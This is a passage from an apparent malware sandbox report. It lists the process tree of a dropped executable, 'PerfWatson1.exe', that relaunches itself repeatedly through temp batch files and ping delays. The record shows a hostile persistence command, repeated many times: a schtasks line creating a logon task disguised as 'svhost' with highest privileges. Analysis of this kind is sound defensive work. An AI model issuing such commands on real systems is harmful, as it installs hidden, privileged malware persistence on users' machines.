        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        26⤵
        Executes dropped EXE
        
        PID:1444
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zewdvRql0rBF.bat" "
        27⤵
        
        PID:1872
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:3300
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        Runs ping.exe
        
        PID:2908
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        28⤵
        Executes dropped EXE
        
        PID:1540
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        29⤵
        
        PID:3704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XOkfOCapixH2.bat" "
        29⤵
        
        PID:4836
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:1376
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        30⤵
        Runs ping.exe
        
        PID:4980
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        30⤵
        Executes dropped EXE
        
        PID:1816
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        31⤵
        
        PID:4916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWV5LILmwDkB.bat" "
        31⤵
        
        PID:2252
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:4288
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1840
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        32⤵
        Executes dropped EXE
        
        PID:1096
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        33⤵
        
        PID:3576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tqd9bvEpV0ua.bat" "
        33⤵
        
        PID:1292
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        34⤵
        
        PID:3908
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        34⤵
        Runs ping.exe
        
        PID:2472
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        34⤵
        Executes dropped EXE
        
        PID:3100
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        35⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ftw3mqLVpZtH.bat" "
        35⤵
        
        PID:2676
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        36⤵
        
        PID:3164
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2444
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        36⤵
        Executes dropped EXE
        
        PID:976
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        37⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sLyrJp9hZt1l.bat" "
        37⤵
        
        PID:2736
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        38⤵
        
        PID:1416
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        38⤵
        Runs ping.exe
        
        PID:3180
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        38⤵
        Executes dropped EXE
        
        PID:4840
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        39⤵
        
        PID:1816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TvXcYRAMCmLa.bat" "
        39⤵
        
        PID:4972
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        40⤵
        
        PID:788
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        40⤵
        
        PID:4488
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        40⤵
        Executes dropped EXE
        
        PID:2616
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        41⤵
        
        PID:4336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\v1MqV8zS0keO.bat" "
        41⤵
        
        PID:2780
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        42⤵
        
        PID:1704
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3536
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        42⤵
        Executes dropped EXE
        
        PID:3372
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        43⤵
        
        PID:4724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WED4FLMtlykw.bat" "
        43⤵
        
        PID:5080
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        44⤵
        
        PID:4976
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        44⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4736
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        44⤵
        Executes dropped EXE
        
        PID:3900
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        45⤵
        
        PID:920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P735ONMHFgAv.bat" "
        45⤵
        
        PID:3300
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        46⤵
        
        PID:2324
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        46⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        46⤵
        Executes dropped EXE
        
        PID:2916
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        47⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MgWZXJj8dCjb.bat" "
        47⤵
        
        PID:1904
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        48⤵
        
        PID:3280
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1116
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        48⤵
        Executes dropped EXE
        
        PID:1376
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        49⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gNnc9t1MefMS.bat" "
        49⤵
        
        PID:3068
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        50⤵
        
        PID:3016
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        50⤵
        Runs ping.exe
        
        PID:1816
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        50⤵
        Executes dropped EXE
        
        PID:4444
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        51⤵
        
        PID:788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eWdLSNzWVWXx.bat" "
        51⤵
        
        PID:2008
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        52⤵
        
        PID:3448
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        52⤵
        Runs ping.exe
        
        PID:4224
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        52⤵
        Executes dropped EXE
        
        PID:4476
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        53⤵
        
        PID:228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ClAP8OY0qr7E.bat" "
        53⤵
        
        PID:3024
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        54⤵
        
        PID:2396
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        54⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4016
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        54⤵
        Executes dropped EXE
        
        PID:1036
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        55⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mnB15KcaDiYm.bat" "
        55⤵
        
        PID:3944
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        56⤵
        
        PID:1876
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        56⤵
        
        PID:2156
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        56⤵
        Executes dropped EXE
        
        PID:2420
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        57⤵
        
        PID:196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Gx59zxdPG3VG.bat" "
        57⤵
        
        PID:3900
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        58⤵
        
        PID:1536
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        58⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:540
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        58⤵
        Executes dropped EXE
        
        PID:2340
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        59⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l0sKY7ywAZNP.bat" "
        59⤵
        
        PID:1120
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        60⤵
        
        PID:2368
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        60⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1784
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        60⤵
        Executes dropped EXE
        
        PID:1116
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        61⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C0h7HxYaBUBo.bat" "
        61⤵
        
        PID:3328
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        62⤵
        
        PID:3528
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        62⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2968
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        62⤵
        Executes dropped EXE
        
        PID:4652
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        63⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wx6Kph6nz0Zz.bat" "
        63⤵
        
        PID:3420
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        64⤵
        
        PID:2836
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        64⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        64⤵
        
        PID:4308
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        65⤵
        
        PID:856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vh0wSPmbBKyc.bat" "
        65⤵
        
        PID:2504
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        66⤵
        
        PID:3896
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        66⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4476
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        66⤵
        
        PID:3488
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        67⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zhedrrgYdTXc.bat" "
        67⤵
        
        PID:684
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        68⤵
        
        PID:960
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        68⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2308
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        68⤵
        
        PID:4108
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        69⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r1Ny2AwHZby2.bat" "
        69⤵
        
        PID:2112
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        70⤵
        
        PID:1980
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        70⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2420
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        70⤵
        
        PID:1944
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        71⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\d0KT3AhTwW64.bat" "
        71⤵
        
        PID:4276
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        72⤵
        
        PID:1420
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        72⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1792
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        72⤵
        
        PID:2584
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        73⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ccP8MoMSkZZY.bat" "
        73⤵
        
        PID:3280
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        74⤵
        
        PID:1388
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        74⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4528
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        74⤵
        
        PID:988
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        75⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\phQRykera6C2.bat" "
        75⤵
        
        PID:832
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        76⤵
        
        PID:1448
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        76⤵
        Runs ping.exe
        
        PID:2068
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        76⤵
        
        PID:2092
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        77⤵
        
        PID:4284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F2sRNGlhbro7.bat" "
        77⤵
        
        PID:2012
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        78⤵
        
        PID:3608
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        78⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        78⤵
        
        PID:828
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        79⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SgiXdtrMxqTA.bat" "
        79⤵
        
        PID:3372
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        80⤵
        
        PID:4220
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        80⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3484
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        80⤵
        
        PID:1252
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        81⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RJf0VG3ZT1TF.bat" "
        81⤵
        
        PID:4780
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        82⤵
        
        PID:1968
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        82⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        82⤵
        
        PID:2560
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        83⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WSrXY5OEpBpo.bat" "
        83⤵
        
        PID:2660
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        84⤵
        
        PID:1944
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        84⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1420
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        84⤵
        
        PID:1956
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        85⤵
        
        PID:2996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSS5rvdHHUg7.bat" "
        85⤵
        
        PID:4768
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        86⤵
        
        PID:792
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        86⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2584
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        86⤵
        
        PID:1316
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        87⤵
        
        PID:1416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HOjTmXfky7zS.bat" "
        87⤵
        
        PID:3016
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        88⤵
        
        PID:3624
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        88⤵
        
        PID:1300
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        88⤵
        
        PID:1572
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        89⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P46oJqKvEUuL.bat" "
        89⤵
        
        PID:3632
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        90⤵
        
        PID:788
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        90⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3988
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        90⤵
        
        PID:2616
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        91⤵
        
        PID:1940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uM3DIavRGUUm.bat" "
        91⤵
        
        PID:2492
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        92⤵
        
        PID:1292
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        92⤵
        Runs ping.exe
        
        PID:4724
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        92⤵
        
        PID:4636
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        93⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MTrnWyhLZ4vu.bat" "
        93⤵
        
        PID:1104
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        94⤵
        
        PID:1876
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        94⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3604
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        94⤵
        
        PID:1496
        
        C:\Windows\SYSTEM32\schtasks.exe
        
